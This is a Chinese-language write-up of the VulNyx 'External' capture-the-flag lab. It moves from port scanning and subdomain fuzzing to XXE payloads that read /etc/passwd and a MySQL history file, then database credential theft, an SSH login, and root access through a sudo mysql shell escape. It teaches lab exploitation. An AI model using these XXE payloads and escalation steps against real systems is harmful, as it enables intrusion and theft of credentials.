首页 靶场练习 VulNyx Easy

# 靶场搭建

下载:External

Nat、IP: 192.168.1.139

# 渗透过程

# 信息初收集

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: 404 Not Found
3306/tcp open  mysql   MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
|   Thread ID: 7
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, ConnectWithDatabase, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, FoundRows, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: *fGoy2*yF2e(7xz}$9/#
|_  Auth Plugin Name: mysql_native_password

F12 源代码提示添加 DNS: ext.nyx ,但是无果,于是爆破子域名

┌──(root㉿kali)-[~]
└─# wfuzz -t 200 -c --hw=24 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ext.nyx" http://ext.nyx
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://ext.nyx/
Total requests: 114441
=====================================================================
ID           Response   Lines    Word       Chars       Payload                            
=====================================================================
000007602:   200        25 L     56 W       1089 Ch     "administrator"
添加到 host 中
访问,注册,发现 post 的数据格式是 xml
那么测试一下存不存在 XXE
┌──(root㉿kali)-[~]
└─# curl --X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [<!ENTITY myentity "XXE VULNERABLE!"> ]>
<details>
<email>
&myentity;
</email>
<password>1234</password>
</details>'
curl: (6) Could not resolve host: POST
<p align='center'> <font color=white size='5pt'> 
XXE VULNERABLE!
 is already registered! </font> </p>
发现存在的,那么我们包含以下 passwd:
┌──(root㉿kali)-[~]
└─# curl --X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<details>
<email>
&xxe;     
</email>
<password>1234</password>
</details>'              
curl: (6) Could not resolve host: POST
<p align='center'> <font color=white size='5pt'> 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash
 is already registered! </font> </p>
拿到了 passwd,结合之前的扫描结果知道运行了数据库,包含一下数据库的历史记录
┌──(root㉿kali)-[~]
└─# curl --X POST "http://administrator.ext.nyx/form.php" -d '<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///home/admin/.mysql_history"> ]>
<details>
<email>
&xxe;
</email>
<password>1234</password>
</details>'
curl: (6) Could not resolve host: POST
<p align='center'> <font color=white size='5pt'> 
ALTER USER 'root'@'%' IDENTIFIED BY 'r00tt00rDB';
exit;
 is already registered! </font> </p>
得到了数据库的账号密码: r00tt00rDB
登录数据库,查询数据
┌──(root㉿kali)-[~]
└─# mysql -h 192.168.1.139 -u root -pr00tt00rDB
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.5.19-MariaDB-0+deb11u2 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| admindb            |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.004 sec)
MariaDB [(none)]> use admindb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [admindb]> show tables;
+-------------------+
| Tables_in_admindb |
+-------------------+
| credentials       |
+-------------------+
1 row in set (0.001 sec)
MariaDB [admindb]> select * from credentials;
+------+-------+--------------------------+
| id   | user  | password                 |
+------+-------+--------------------------+
|    1 | admin | 4dminDBS3cur3P4ssw0rd123 |
+------+-------+--------------------------+
1 row in set (0.005 sec)
拿到账号密码,ssh 到 admin
# 提权
sudo -l 发现数据库有 sudo 权限
admin@external:~$ sudo mysql -pr00tt00rDB -e '\! /bin/sh'
# cat /root/root.txt
059ca941ad55fd318d68e675f85dd733
拿到了 root 权限